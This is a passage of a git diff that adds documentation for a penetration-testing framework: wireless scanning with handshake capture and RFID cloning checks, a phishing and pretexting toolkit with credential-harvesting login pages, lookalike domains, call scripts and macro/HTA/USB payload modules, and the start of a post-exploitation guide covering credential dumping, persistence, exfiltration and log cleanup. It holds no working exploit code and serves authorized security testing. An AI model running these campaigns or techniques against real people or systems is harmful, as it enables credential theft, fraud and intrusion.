ubertoothResult = UbertoothParser.parse(ubertoothOutput) + +// Parse hcxtools output +const pmkidOutput = await fs.readFile("/tmp/pmkid.16800", "utf-8") +const hcxResult = HcxToolsParser.parsePMKID(pmkidOutput) +``` + +## Tool Actions + +| Action | Description | +|--------|-------------| +| `scan` | Full wireless scan with specified profile | +| `wifi` | WiFi-specific scanning | +| `bluetooth` | Bluetooth device scanning | +| `rfid` | RFID/NFC tag scanning | +| `interfaces` | List available wireless interfaces | +| `networks` | List discovered WiFi networks | +| `devices` | List discovered Bluetooth devices | +| `tags` | List discovered RFID/NFC tags | +| `security` | Security assessment for a scan | +| `rogue-ap` | Rogue AP and evil twin detection | +| `handshake` | Capture/analyze WPA handshakes | +| `baseline` | Manage network baselines | +| `report` | Generate scan report | +| `status` | Get scan status | +| `stop` | Stop a running scan | +| `profiles` | List available scan profiles | + +## Scan Profiles + +| Profile | WiFi | Bluetooth | RFID | Active Tests | Stealth | +|---------|------|-----------|------|--------------|---------| +| `discovery` | Passive scan | Discovery only | Read only | No | Yes | +| `quick` | Basic scan | Quick scan | Basic | Minimal | Partial | +| `standard` | Full passive | Full scan | Full read | No | Yes | +| `thorough` | Comprehensive | Deep scan | Full analysis | Some | No | +| `passive` | Listen only | Listen only | None | No | Yes | +| `active` | Full active | Active probe | Write tests | Yes | No | + +## Security Checks + +### WiFi Vulnerabilities + +| Vulnerability | CVE | Severity | Description | +|--------------|-----|----------|-------------| +| KRACK | CVE-2017-13077 | High | Key Reinstallation Attack | +| Dragonblood | CVE-2019-9494 | High | WPA3 SAE vulnerabilities | +| PMKID Attack | N/A | Medium | PMKID-based offline attack | +| WPS PIN | N/A | Medium | Weak WPS implementation | +| Hidden SSID | N/A | Low | SSID hiding (ineffective) | +| Open Network | N/A | High | No encryption | +| WEP | N/A | Critical | Broken encryption | +| WPA-TKIP | N/A | Medium | Deprecated cipher | + +### Bluetooth Vulnerabilities + +| Vulnerability | CVE | Severity | Description | +|--------------|-----|----------|-------------| +| BlueBorne | CVE-2017-0781 | Critical | RCE via Bluetooth | +| KNOB | CVE-2019-9506 | High | Key Negotiation weakness | +| BIAS | CVE-2020-10135 | High | Impersonation attack | +| BLESA | CVE-2020-9770 | Medium | BLE spoofing attack | +| BlueSmack | N/A | Medium | DoS attack | +| BlueSnarfing | N/A | High | Data theft | +| BlueJacking | N/A | Low | Unsolicited messages | + +### RFID Vulnerabilities + +| Vulnerability | Severity | Description | +|--------------|----------|-------------| +| Default Keys | Critical | Factory default keys in use | +| Crypto-1 Weak | Critical | MIFARE Classic crypto weakness | +| UID Cloning | High | UID-only authentication | +| Replay Attack | High | Captured data replay | +| Side Channel | Medium | Power analysis attacks | +| No Auth | Critical | No authentication required | + +## Events + +| Event | Description | +|-------|-------------| +| `pentest.wirelessscan.scan_started` | Scan initiated | +| `pentest.wirelessscan.scan_completed` | Scan finished | +| `pentest.wirelessscan.scan_failed` | Scan failed | +| `pentest.wirelessscan.network_discovered` | WiFi network found | +| `pentest.wirelessscan.device_discovered` | Bluetooth device found | +| `pentest.wirelessscan.tag_discovered` | RFID tag found | +| `pentest.wirelessscan.vulnerability_found` | Security issue detected | +| `pentest.wirelessscan.rogue_ap_detected` | Rogue AP identified | +| `pentest.wirelessscan.handshake_captured` | WPA handshake captured | +| `pentest.wirelessscan.deauth_detected` | Deauth attack detected | + +## Data Types + +### WiFiNetwork + +```typescript +{ + id: string + bssid: string // AP MAC address + essid: string // Network name + channel: number + frequency: number + band: "2.4ghz" | "5ghz" | "6ghz" + signal: number // dBm + quality: number // 0-100 + encryption: "open" | "wep" | "wpa" | "wpa2" | "wpa3" + cipher: "ccmp" | "tkip" | "wep" | "gcmp" + authentication: "psk" | "eap" | "sae" | "owe" | "open" + wps: boolean + wpsLocked: boolean + hidden: boolean + vendor: string + clients: string[] + pmkidVulnerable: boolean + firstSeen: number + lastSeen: number +} +``` + +### BluetoothDevice + +```typescript +{ + id: string + address: string // MAC address + name: string + type: "classic" | "ble" | "dual" + deviceClass: number + classDescription: string + vendor: string + rssi: number + services: BluetoothService[] + paired: boolean + connected: boolean + legacyPairing: boolean + vulnerabilities: string[] + firstSeen: number + lastSeen: number +} +``` + +### RFIDTag + +```typescript +{ + id: string + uid: string // Tag UID + type: "mifare_classic" | "mifare_desfire" | "ntag" | "hid" | "em4100" + frequency: "125khz" | "13.56mhz" + size: number // bytes + sectors: number + blocks: number + manufacturer: string + atqa: string // Answer to Request A + sak: string // Select Acknowledge + readable: boolean + writable: boolean + clonable: boolean + vulnerabilities: string[] + discoveredAt: number +} +``` + +### WirelessFinding + +```typescript +{ + id: string + scanId: string + type: "wifi" | "bluetooth" | "rfid" + target: string // BSSID, MAC, UID + title: string + description: string + severity: "critical" | "high" | "medium" | "low" | "info" + cve: string[] + cwe: string + recommendation: string + evidence: string + verified: boolean + detectedAt: number +} +``` + +## External Tools + +### Required Tools + +| Tool | Purpose | Installation | +|------|---------|--------------| +| Aircrack-ng | WiFi security suite | `apt install aircrack-ng` | +| iw | Wireless configuration | `apt install iw` | + +### Optional Tools + +| Tool | Purpose | Installation | +|------|---------|--------------| +| Kismet | Wireless detector | https://www.kismetwireless.net/ | +| Bettercap | Network attack tool | https://www.bettercap.org/ | +| Ubertooth | Bluetooth sniffer | https://github.com/greatscottgadgets/ubertooth | +| Proxmark3 | RFID tool | https://github.com/Proxmark/proxmark3 | +| hcxtools | WPA capture tools | https://github.com/ZerBea/hcxtools | +| hcxdumptool | Traffic capture | https://github.com/ZerBea/hcxdumptool | +| Bluez | Linux Bluetooth | `apt install bluez` | +| libnfc | NFC tools | `apt install libnfc-bin` | + +## Example Use Cases + +### Use Case 1: Corporate WiFi Audit + +```bash +# Full corporate WiFi assessment +wirelessscan scan profile=thorough interface=wlan0 duration=300 + +# Check for rogue APs +wirelessscan rogue-ap interface=wlan0mon ssid="Corp-WiFi" + +# Assess specific network +wirelessscan security bssid=AA:BB:CC:DD:EE:FF +``` + +### Use Case 2: Evil Twin Detection + +```bash +# Create baseline of known networks +wirelessscan baseline baselineAction=create baselineName=corporate + +# Monitor for evil twins +wirelessscan scan profile=passive interface=wlan0mon + +# Compare against baseline +wirelessscan baseline baselineAction=compare baselineName=corporate +``` + +### Use Case 3: WPA Handshake Capture + +```bash +# Start handshake capture +wirelessscan handshake interface=wlan0mon bssid=AA:BB:CC:DD:EE:FF + +# Check capture status +wirelessscan status scanId= +``` + +### Use Case 4: Bluetooth Device Audit + +```bash +# Scan for Bluetooth devices +wirelessscan bluetooth duration=60 + +# Check for vulnerabilities +wirelessscan devices +wirelessscan security scanId= +``` + +### Use Case 5: Access Card Assessment + +```bash +# Scan for RFID tags +wirelessscan rfid reader=proxmark3 frequency=13.56mhz + +# Analyze discovered cards +wirelessscan tags + +# Check cloning vulnerability +wirelessscan security scanId= +``` + +## Storage + +Scan data is persisted in: + +``` +pentest/wirelessscan/ + scans/ + wirelessscan_abc123.json # Scan results + networks/ + network_def456.json # WiFi networks + devices/ + device_ghi789.json # Bluetooth devices + tags/ + tag_jkl012.json # RFID tags + findings/ + finding_mno345.json # Security findings + baselines/ + corporate.json # Network baselines +``` + +## Testing + +Run the tests: + +```bash +bun test test/pentest/wirelessscan.test.ts +``` + +## Integration + +The tool is registered in `src/tool/registry.ts`: +- `WirelessScanTool` - Available as `wirelessscan` tool + +Exports available from `src/pentest/index.ts`: +- All types: `WirelessScanTypes` +- Events: `WirelessScanEvents` +- Storage: `WirelessScanStorage` +- Profiles: `WirelessScanProfiles` +- Orchestrator: `WirelessScanOrchestrator` +- Tool: `WirelessScanTool` +- Parsers: `AircrackParser`, `KismetParser`, `BettercapParser`, `UbertoothParser`, `HcxToolsParser` +- WiFi: `WiFiDiscovery`, `WiFiSecurity`, `WiFiRogueAP`, `WiFiClients`, `WiFiHandshake`, `WiFiDeauth` +- Bluetooth: `BluetoothDiscovery`, `BluetoothBLE`, `BluetoothClassic`, `BluetoothProfiles`, `BluetoothVulnerabilities` +- RFID: `RFIDDiscovery`, `RFIDReaders`, `RFIDCards`, `RFIDCloning`, `RFIDVulnerabilities` + +## Hardware Requirements + +### WiFi Scanning + +For passive scanning, any WiFi adapter works. For monitor mode and packet injection: + +| Adapter | Chipset | Monitor | Injection | +|---------|---------|---------|-----------| +| Alfa AWUS036ACH | RTL8812AU | Yes | Yes | +| Alfa AWUS036ACS | RTL8811AU | Yes | Yes | +| TP-Link TL-WN722N v1 | Atheros AR9271 | Yes | Yes | +| Panda PAU09 | Ralink RT5572 | Yes | Yes | + +### Bluetooth Scanning + +| Device | Type | Features | +|--------|------|----------| +| Built-in adapter | HCI | Basic scanning | +| Ubertooth One | BLE sniffer | Packet capture | +| CSR 4.0 dongle | HCI | Extended range | + +### RFID/NFC Scanning + +| Reader | Frequencies | Features | +|--------|-------------|----------| +| Proxmark3 | 125kHz, 13.56MHz | Full analysis | +| ACR122U | 13.56MHz | Basic NFC | +| Chameleon Mini | 13.56MHz | Emulation | diff --git a/docs/PHASE15-social-engineering.md b/docs/PHASE15-social-engineering.md new file mode 100644 index 00000000000..34d5c14c0ec --- /dev/null +++ b/docs/PHASE15-social-engineering.md @@ -0,0 +1,664 @@ +# Phase 15: Social Engineering Toolkit + +## Overview + +Phase 15 introduces the **Social Engineering Toolkit** (`pentest/soceng/`) - a comprehensive framework for authorized security testing, red team engagements, and security awareness training programs. + +> **IMPORTANT DISCLAIMER**: This module is intended for AUTHORIZED security testing ONLY. Unauthorized use against systems or individuals without explicit permission is illegal and unethical. Always ensure written authorization, compliance with applicable laws, proper scoping, and ethical handling of captured data. + +## Module Structure + +``` +src/pentest/soceng/ +├── index.ts # Module exports +├── types.ts # SocEngTypes namespace (Zod schemas) +├── events.ts # SocEngEvents +├── storage.ts # Campaign persistence +├── profiles.ts # Campaign profiles +├── tool.ts # SocEngTool for agent +├── orchestrator.ts # Campaign coordination +├── email/ +│ ├── index.ts +│ ├── generator.ts # Email content generation +│ ├── spoof.ts # Spoofing analysis +│ ├── headers.ts # Email header manipulation +│ └── validation.ts # SPF/DKIM/DMARC validation +├── phishing/ +│ ├── index.ts +│ ├── campaigns.ts # Campaign management +│ ├── templates.ts # Email templates +│ ├── landing.ts # Landing page templates +│ ├── payloads.ts # Phishing payloads +│ └── tracking.ts # Click/open tracking +├── pretexting/ +│ ├── index.ts +│ ├── scenarios.ts # Pretexting scenarios +│ ├── personas.ts # Social engineering personas +│ ├── scripts.ts # Call scripts with dialogue trees +│ └── osint.ts # OSINT integration +├── payloads/ +│ ├── index.ts +│ ├── usb.ts # USB drop payloads +│ ├── documents.ts # Malicious documents +│ ├── macros.ts # VBA macro payloads +│ └── hta.ts # HTA application payloads +├── recon/ +│ ├── index.ts +│ ├── email.ts # Email discovery +│ ├── organization.ts # Organization profiling +│ └── social.ts # Social media reconnaissance +└── awareness/ + ├── index.ts + ├── training.ts # Training modules + ├── metrics.ts # Awareness metrics + └── reporting.ts # Campaign reporting +``` + +## Capabilities + +### Email Security Assessment + +| Feature | Description | +|---------|-------------| +| SPF Validation | Sender Policy Framework configuration check | +| DKIM Validation | DomainKeys Identified Mail verification | +| DMARC Validation | Domain-based Message Authentication check | +| Spoofing Analysis | Email spoofing vulnerability assessment | +| Lookalike Domains | Generate typosquatting/lookalike domains | +| Header Analysis | Email header manipulation detection | + +### Phishing Campaign Management + +| Feature | Description | +|---------|-------------| +| Campaign Creation | Multi-type campaign setup and management | +| Target Import | CSV-based target list import | +| Email Templates | Pre-built and custom phishing templates | +| Landing Pages | Credential harvesting page templates | +| Click Tracking | Open, click, and submission tracking | +| Campaign Reports | Detailed statistics and reports | + +### Pretexting Framework + +| Feature | Description | +|---------|-------------| +| Scenario Library | Pre-built social engineering scenarios | +| Persona Management | Detailed persona profiles | +| Call Scripts | Dialogue trees with objection handlers | +| OSINT Integration | Reconnaissance data integration | +| Objection Handling | Response strategies for resistance | + +### Payload Generation + +| Feature | Description | +|---------|-------------| +| USB Drop | Rubber ducky and BadUSB payloads | +| Office Documents | Macro-enabled document payloads | +| VBA Macros | Custom macro payload generation | +| HTA Applications | HTML Application payloads | +| PDF Exploits | PDF-based payload templates | + +### OSINT Reconnaissance + +| Feature | Description | +|---------|-------------| +| Email Discovery | Email address enumeration | +| Organization Profiling | Company structure analysis | +| Social Media Recon | LinkedIn, Twitter, Facebook reconnaissance | +| Search Query Generation | Optimized OSINT search queries | +| Email Permutations | Email format guessing | + +### Security Awareness + +| Feature | Description | +|---------|-------------| +| Training Modules | Interactive training content | +| Awareness Metrics | Click rate, report rate calculation | +| Industry Benchmarks | Compare against industry standards | +| Executive Reports | Management-ready summaries | +| Quiz Generation | Phishing awareness quizzes | + +## Usage + +### Email Security Assessment + +```typescript +import { EmailValidation, EmailSpoof, EmailGenerator } from "./pentest/soceng" + +// Check domain email security +const security = await EmailValidation.checkDomain("example.com") +console.log(`SPF: ${security.spf.status}`) +console.log(`DKIM: ${security.dkim.status}`) +console.log(`DMARC: ${security.dmarc.status}`) +console.log(`Spoofable: ${security.spoofable}`) + +// Detailed spoofing assessment +const spoofAssessment = await EmailSpoof.assessSpoofability("example.com") +console.log(`Overall Risk: ${spoofAssessment.risk}`) +console.log(`Recommendations: ${spoofAssessment.recommendations.join(", ")}`) + +// Generate lookalike domains +const lookalikes = EmailGenerator.generateLookalikeDomains("example.com") +for (const domain of lookalikes) { + console.log(`${domain.domain} - ${domain.technique}`) +} +``` + +### Phishing Campaign Management + +```typescript +import { PhishingCampaigns, PhishingTemplates, PhishingLanding } from "./pentest/soceng" + +// Create a new campaign +const campaign = await PhishingCampaigns.create({ + name: "Security Awareness Q1 2024", + type: "credential-harvest", + profile: "awareness", + targets: [ + { email: "user1@company.com", firstName: "John", lastName: "Doe", department: "IT" }, + { email: "user2@company.com", firstName: "Jane", lastName: "Smith", department: "HR" }, + ], + templateId: "password-reset", + landingPageId: "microsoft-365", + senderProfile: { + name: "IT Security Team", + email: "security@company-it-support.com", + replyTo: "noreply@company.com" + }, + schedule: { + startTime: Date.now() + 86400000, // Start in 24 hours + sendRate: 10, // 10 emails per hour + randomize: true + } +}) + +console.log(`Campaign created: ${campaign.id}`) + +// List available templates +const templates = PhishingTemplates.list() +for (const template of templates) { + console.log(`${template.id}: ${template.name} (${template.category})`) +} + +// Generate custom template +const customEmail = PhishingTemplates.generate({ + templateId: "password-reset", + variables: { + companyName: "Acme Corp", + targetName: "John Doe", + urgency: "24 hours", + linkUrl: "https://tracking.example.com/xyz123" + } +}) + +// List landing pages +const landingPages = PhishingLanding.list() +for (const page of landingPages) { + console.log(`${page.id}: ${page.name} - ${page.type}`) +} + +// Get campaign statistics +const stats = await PhishingCampaigns.getStats(campaign.id) +console.log(`Sent: ${stats.sent}`) +console.log(`Opened: ${stats.opened} (${stats.openRate}%)`) +console.log(`Clicked: ${stats.clicked} (${stats.clickRate}%)`) +console.log(`Submitted: ${stats.submitted} (${stats.submitRate}%)`) +console.log(`Reported: ${stats.reported} (${stats.reportRate}%)`) +``` + +### Pretexting Scenarios + +```typescript +import { PretextingScenarios, PretextingPersonas, PretextingScripts } from "./pentest/soceng" + +// List available scenarios +const scenarios = PretextingScenarios.list() +for (const scenario of scenarios) { + console.log(`${scenario.id}: ${scenario.name}`) + console.log(` Category: ${scenario.category}`) + console.log(` Difficulty: ${scenario.difficulty}`) +} + +// Get scenario details +const scenario = PretextingScenarios.get("it-support") +console.log(`Scenario: ${scenario.name}`) +console.log(`Description: ${scenario.description}`) +console.log(`Pretext: ${scenario.pretext}`) +console.log(`Objectives: ${scenario.objectives.join(", ")}`) + +// List personas +const personas = PretextingPersonas.list() +for (const persona of personas) { + console.log(`${persona.id}: ${persona.name} (${persona.role})`) +} + +// Get persona details +const persona = PretextingPersonas.get("helpdesk-tech") +console.log(`Name: ${persona.name}`) +console.log(`Role: ${persona.role}`) +console.log(`Background: ${persona.background}`) +console.log(`Speech Patterns: ${persona.speechPatterns.join(", ")}`) + +// Get call script +const script = PretextingScripts.get("password-reset-call", { + targetName: "John", + companyName: "Acme Corp", + department: "IT Support" +}) +console.log(`Opening: ${script.opening}`) +console.log(`Key Points: ${script.keyPoints.join(", ")}`) +console.log(`Objection Handlers:`) +for (const [objection, response] of Object.entries(script.objectionHandlers)) { + console.log(` "${objection}" -> "${response}"`) +} +``` + +### OSINT Reconnaissance + +```typescript +import { EmailRecon, OrgRecon, SocialRecon } from "./pentest/soceng" + +// Generate email permutations +const emails = EmailRecon.generatePermutations({ + firstName: "John", + lastName: "Doe", + domain: "example.com" +}) +console.log(`Possible emails: ${emails.join(", ")}`) + +// Generate OSINT search queries +const queries = OrgRecon.generateSearchQueries("Acme Corporation") +console.log("Google Dorks:") +for (const query of queries.googleDorks) { + console.log(` ${query}`) +} +console.log("LinkedIn Queries:") +for (const query of queries.linkedin) { + console.log(` ${query}`) +} + +// Organization profiling queries +const orgQueries = OrgRecon.getProfilingQueries("example.com") +console.log(`Technology Stack: ${orgQueries.technology.join(", ")}`) +console.log(`Employee Discovery: ${orgQueries.employees.join(", ")}`) +``` + +### Security Awareness Training + +```typescript +import { AwarenessTraining, AwarenessMetrics, AwarenessReporting } from "./pentest/soceng" + +// List training modules +const modules = AwarenessTraining.listModules() +for (const module of modules) { + console.log(`${module.id}: ${module.title}`) + console.log(` Duration: ${module.duration} minutes`) + console.log(` Topics: ${module.topics.join(", ")}`) +} + +// Get training content +const content = AwarenessTraining.getContent("phishing-basics") +console.log(`Title: ${content.title}`) +console.log(`Sections: ${content.sections.length}`) + +// Calculate campaign metrics +const metrics = AwarenessMetrics.calculate(campaignStats) +console.log(`Click Rate: ${metrics.clickRate}%`) +console.log(`Report Rate: ${metrics.reportRate}%`) +console.log(`Phish-Prone Percentage: ${metrics.phishPronePercentage}%`) +console.log(`Industry Comparison: ${metrics.industryComparison}`) + +// Generate executive summary +const summary = AwarenessReporting.executiveSummary({ + campaignId: campaign.id, + includeRecommendations: true, + includeBenchmarks: true +}) +console.log(summary.markdown) +``` + +## Tool Actions + +| Category | Action | Description | +|----------|--------|-------------| +| Email | `email-security` | Assess domain email security (SPF/DKIM/DMARC) | +| Email | `spoof-assessment` | Assess spoofing vulnerability | +| Email | `lookalike-domains` | Generate lookalike domains | +| Phishing | `create-campaign` | Create a phishing campaign | +| Phishing | `list-campaigns` | List all campaigns | +| Phishing | `campaign-status` | Get campaign statistics | +| Phishing | `campaign-report` | Generate detailed report | +| Phishing | `import-targets` | Import targets from CSV | +| Templates | `list-templates` | List phishing email templates | +| Templates | `generate-template` | Generate email template | +| Templates | `list-landing-pages` | List landing page templates | +| Pretexting | `list-scenarios` | List pretexting scenarios | +| Pretexting | `scenario-details` | Get scenario details | +| Pretexting | `list-personas` | List available personas | +| Pretexting | `persona-details` | Get persona details | +| Pretexting | `get-script` | Get call script | +| Recon | `recon-queries` | Generate OSINT search queries | +| Recon | `email-permutations` | Generate email permutations | +| Awareness | `list-training` | List training modules | +| Awareness | `training-content` | Get training content | +| Awareness | `campaign-metrics` | Calculate awareness metrics | +| Awareness | `executive-summary` | Generate executive summary | +| Session | `start-session` | Start a new session | +| Session | `session-status` | Get session status | +| Session | `end-session` | End current session | + +## Campaign Types + +| Type | Description | Objective | +|------|-------------|-----------| +| `credential-harvest` | Fake login page | Capture credentials | +| `payload-delivery` | Malicious attachment | Deliver payload | +| `link-click` | Track link clicks | Measure susceptibility | +| `data-entry` | Form submission | Capture sensitive data | +| `callback` | Phone call request | Social engineering | +| `usb-drop` | Physical USB drop | Test physical security | +| `awareness-test` | Non-malicious test | Training purposes | + +## Phishing Templates + +### Email Templates + +| ID | Name | Category | +|----|------|----------| +| `password-reset` | Password Reset Required | IT Security | +| `account-verification` | Account Verification | Account Security | +| `document-shared` | Document Shared With You | Collaboration | +| `invoice-attached` | Invoice Attached | Finance | +| `hr-policy-update` | HR Policy Update | Human Resources | +| `executive-request` | Urgent Request from Executive | Business Email Compromise | +| `delivery-notification` | Package Delivery Update | Shipping | +| `voicemail-notification` | New Voicemail Message | Communications | + +### Landing Page Templates + +| ID | Name | Type | +|----|------|------| +| `microsoft-365` | Microsoft 365 Login | Credential Harvest | +| `google-workspace` | Google Workspace Login | Credential Harvest | +| `generic-login` | Generic Corporate Login | Credential Harvest | +| `webmail` | Webmail Access | Credential Harvest | +| `vpn-portal` | VPN Portal Login | Credential Harvest | +| `file-download` | File Download Page | Payload Delivery | +| `survey-form` | Survey/Feedback Form | Data Entry | + +## Pretexting Scenarios + +| ID | Name | Category | Difficulty | +|----|------|----------|------------| +| `it-support` | IT Support Call | Technical | Easy | +| `hr-benefits` | HR Benefits Update | HR | Easy | +| `vendor-invoice` | Vendor Invoice Query | Finance | Medium | +| `executive-assistant` | Executive Assistant | BEC | Medium | +| `security-audit` | Security Audit Team | Security | Hard | +| `new-employee` | New Employee Onboarding | HR | Easy | +| `building-maintenance` | Building Maintenance | Physical | Medium | +| `delivery-driver` | Delivery Driver | Physical | Easy | + +## Events + +| Event | Description | +|-------|-------------| +| `pentest.soceng.session_started` | Assessment session started | +| `pentest.soceng.session_ended` | Assessment session ended | +| `pentest.soceng.campaign_created` | Phishing campaign created | +| `pentest.soceng.campaign_launched` | Campaign started sending | +| `pentest.soceng.campaign_completed` | Campaign finished | +| `pentest.soceng.email_sent` | Phishing email sent | +| `pentest.soceng.email_opened` | Email opened (tracking pixel) | +| `pentest.soceng.link_clicked` | Phishing link clicked | +| `pentest.soceng.credential_captured` | Credentials submitted | +| `pentest.soceng.phish_reported` | User reported phishing | +| `pentest.soceng.payload_executed` | Payload was executed | + +## Data Types + +### PhishingCampaign + +```typescript +{ + id: string + name: string + type: "credential-harvest" | "payload-delivery" | "link-click" | ... + status: "draft" | "scheduled" | "running" | "paused" | "completed" + profile: string + targets: Target[] + templateId: string + landingPageId?: string + senderProfile: { + name: string + email: string + replyTo?: string + } + schedule: { + startTime: number + endTime?: number + sendRate: number + randomize: boolean + } + stats: CampaignStats + createdAt: number + launchedAt?: number + completedAt?: number +} +``` + +### Target + +```typescript +{ + id: string + email: string + firstName?: string + lastName?: string + department?: string + title?: string + manager?: string + customFields?: Record + status: "pending" | "sent" | "opened" | "clicked" | "submitted" | "reported" + events: TargetEvent[] +} +``` + +### PretextingScenario + +```typescript +{ + id: string + name: string + category: "technical" | "hr" | "finance" | "security" | "physical" + difficulty: "easy" | "medium" | "hard" + description: string + pretext: string + objectives: string[] + requiredInfo: string[] + suggestedPersona: string + keyTalkingPoints: string[] + objectionHandlers: Record + successIndicators: string[] + ethicalBoundaries: string[] +} +``` + +### AwarenessMetrics + +```typescript +{ + campaignId: string + totalTargets: number + emailsSent: number + emailsOpened: number + linksClicked: number + credentialsSubmitted: number + phishReported: number + openRate: number + clickRate: number + submitRate: number + reportRate: number + phishPronePercentage: number + industryBenchmark: { + clickRate: number + reportRate: number + } + departmentBreakdown: Record + timeToClick: { + average: number + median: number + fastest: number + } + recommendations: string[] +} +``` + +## Security Considerations + +### Ethical Guidelines + +1. **Authorization Required**: Always obtain written authorization before testing +2. **Scope Limits**: Stay within defined scope and rules of engagement +3. **Data Protection**: Handle captured credentials securely +4. **No Real Harm**: Never use captured data for malicious purposes +5. **Immediate Notification**: Report critical findings immediately +6. **Training Focus**: Emphasize awareness training over punishment + +### Data Handling + +- Captured credentials should be hashed or encrypted +- PII should be minimized and protected +- Campaign data should be retained only as long as necessary +- Results should be shared only with authorized personnel + +### Legal Compliance + +- Ensure compliance with GDPR, CCPA, and other privacy laws +- Follow anti-phishing regulations in your jurisdiction +- Document authorization and scope clearly +- Maintain audit trails for all activities + +## Example Use Cases + +### Use Case 1: Security Awareness Assessment + +```bash +# Check domain email security first +soceng email-security domain=example.com + +# Create awareness campaign +soceng create-campaign \ + campaignName="Q1 Awareness Test" \ + campaignType=awareness-test \ + templateId=password-reset \ + landingPageId=microsoft-365 + +# Import targets +soceng import-targets campaignId= file=/path/to/targets.csv + +# Monitor progress +soceng campaign-status campaignId= + +# Generate report +soceng campaign-report campaignId= + +# Get metrics +soceng campaign-metrics campaignId= + +# Executive summary +soceng executive-summary campaignId= +``` + +### Use Case 2: Red Team Engagement + +```bash +# OSINT reconnaissance +soceng recon-queries domain=target-company.com +soceng email-permutations firstName=John lastName=Doe domain=target-company.com + +# Assess spoofing potential +soceng spoof-assessment domain=target-company.com +soceng lookalike-domains domain=target-company.com + +# Prepare pretexting +soceng list-scenarios +soceng scenario-details scenarioId=it-support +soceng get-script scriptId=password-reset-call targetName=John +``` + +### Use Case 3: Employee Training Program + +```bash +# List training modules +soceng list-training + +# Get specific training content +soceng training-content moduleId=phishing-basics + +# Calculate metrics for completed campaign +soceng campaign-metrics campaignId= + +# Generate executive summary +soceng executive-summary campaignId= +``` + +## Storage + +Campaign data is persisted in: + +``` +pentest/soceng/ + sessions/ + session_abc123.json # Session data + campaigns/ + campaign_def456.json # Campaign configuration + targets/ + target_ghi789.json # Target information + events/ + event_jkl012.json # Tracking events + templates/ + custom_template_mno345.json # Custom templates + reports/ + report_pqr678.json # Generated reports +``` + +## Testing + +Run the tests: + +```bash +bun test test/pentest/soceng.test.ts +``` + +## Integration + +The tool is registered in `src/tool/registry.ts`: +- `SocEngTool` - Available as `soceng` tool + +Exports available from `src/pentest/index.ts`: +- All types: `SocEngTypes` +- Events: `SocEngEvents` +- Storage: `SocEngStorage` +- Profiles: `SocEngProfiles` +- Orchestrator: `SocEngOrchestrator` +- Tool: `SocEngTool` +- Email: `EmailGenerator`, `EmailSpoof`, `EmailHeaders`, `EmailValidation` +- Phishing: `PhishingCampaigns`, `PhishingTemplates`, `PhishingTracking`, `PhishingLanding`, `PhishingPayloads` +- Pretexting: `PretextingScenarios`, `PretextingPersonas`, `PretextingScripts`, `PretextingOSINT` +- Payloads: `USBPayloads`, `DocumentPayloads`, `MacroPayloads`, `HTAPayloads` +- Recon: `EmailRecon`, `OrgRecon`, `SocialRecon` +- Awareness: `AwarenessTraining`, `AwarenessMetrics`, `AwarenessReporting` + +## Industry Benchmarks + +Based on industry research, typical phishing metrics: + +| Metric | Average | Good | Excellent | +|--------|---------|------|-----------| +| Click Rate | 10-15% | 5-10% | <5% | +| Submit Rate | 3-5% | 1-3% | <1% | +| Report Rate | 10-20% | 20-40% | >40% | +| Time to Click | 1-4 hours | N/A | N/A | + +Source: Industry reports from KnowBe4, Proofpoint, and Verizon DBIR diff --git a/docs/PHASE16-post-exploitation.md b/docs/PHASE16-post-exploitation.md new file mode 100644 index 00000000000..4d38221522b --- /dev/null +++ b/docs/PHASE16-post-exploitation.md @@ -0,0 +1,762 @@ +# Phase 16: Post-Exploitation Framework + +## Overview + +Phase 16 introduces the **Post-Exploitation Framework** (`pentest/postexploit/`) - a guidance-based framework for privilege escalation, lateral movement, credential harvesting, persistence, data exfiltration, and cleanup during authorized penetration testing engagements. + +> **IMPORTANT**: This module provides GUIDANCE and INFORMATION for authorized penetration testing. It does not automatically execute exploits. All techniques are documented for educational purposes and authorized security assessments only. + +## Module Structure + +``` +src/pentest/postexploit/ +├── index.ts # Module exports +├── types.ts # PostExploitTypes namespace (Zod schemas) +├── events.ts # PostExploitEvents +├── storage.ts # Session persistence +├── profiles.ts # Assessment profiles +├── tool.ts # PostExploitTool for agent +├── orchestrator.ts # Workflow coordination +├── privesc/ +│ ├── index.ts +│ ├── linux.ts # Linux privesc (SUID, sudo, capabilities, kernel) +│ └── windows.ts # Windows privesc (services, registry, tokens, UAC) +├── lateral/ +│ ├── index.ts +│ ├── discovery.ts # Target discovery +│ ├── methods.ts # Movement methods (SMB, WMI, SSH, RDP) +│ └── paths.ts # Path analysis +├── creds/ +│ ├── index.ts +│ ├── discovery.ts # Credential location discovery +│ ├── linux.ts # Linux creds (shadow, SSH keys, configs) +│ └── windows.ts # Windows creds (SAM, LSASS, NTDS, DPAPI) +├── persistence/ +│ ├── index.ts +│ ├── catalog.ts # Mechanism catalog +│ ├── linux.ts # Linux persistence (cron, systemd, SSH keys) +│ └── windows.ts # Windows persistence (registry, tasks, WMI) +├── exfil/ +│ ├── index.ts +│ ├── targets.ts # Data target discovery +│ └── channels.ts # Exfil channels (DNS, HTTP, SSH, SMB) +├── cleanup/ +│ ├── index.ts +│ ├── artifacts.ts # Artifact tracking +│ ├── logs.ts # Log cleanup guidance +│ └── checklist.ts # Cleanup verification checklist +└── parsers/ + ├── index.ts + ├── linpeas.ts # LinPEAS output parser + └── winpeas.ts # WinPEAS output parser +``` + +## Capabilities + +### Privilege Escalation + +#### Linux Vectors + +| Category | Description | MITRE | +|----------|-------------|-------| +| SUID Binaries | Exploitable SUID binaries with GTFOBins references | T1548.001 | +| Sudo Misconfig | Sudo rule exploitation | T1548.003 | +| Capabilities | Linux capabilities abuse | T1068 | +| Cron Jobs | Writable cron job exploitation | T1053.003 | +| Kernel Exploits | Kernel vulnerability exploitation | T1068 | +| Service Abuse | Writable service files | T1574.010 | +| Path Hijacking | PATH environment exploitation | T1574.007 | +| Container Escape | Docker/container breakout | T1611 | + +#### Windows Vectors + +| Category | Description | MITRE | +|----------|-------------|-------| +| Service Exploits | Unquoted paths, weak permissions | T1574.010 | +| Registry Abuse | AlwaysInstallElevated, autorun | T1547.001 | +| Token Manipulation | SeImpersonate, SeDebug privileges | T1134 | +| UAC Bypass | FodHelper, EventVwr, CMSTP | T1548.002 | +| DLL Hijacking | Missing DLL exploitation | T1574.001 | +| Scheduled Tasks | Task file manipulation | T1053.005 | +| Stored Credentials | Credential Manager, DPAPI | T1555 | + +### Lateral Movement + +| Method | Ports | Description | MITRE | +|--------|-------|-------------|-------| +| SMB/PSExec | 445 | Remote command execution | T1021.002 | +| WMI | 135 | Windows Management Instrumentation | T1047 | +| WinRM | 5985/5986 | Windows Remote Management | T1021.006 | +| RDP | 3389 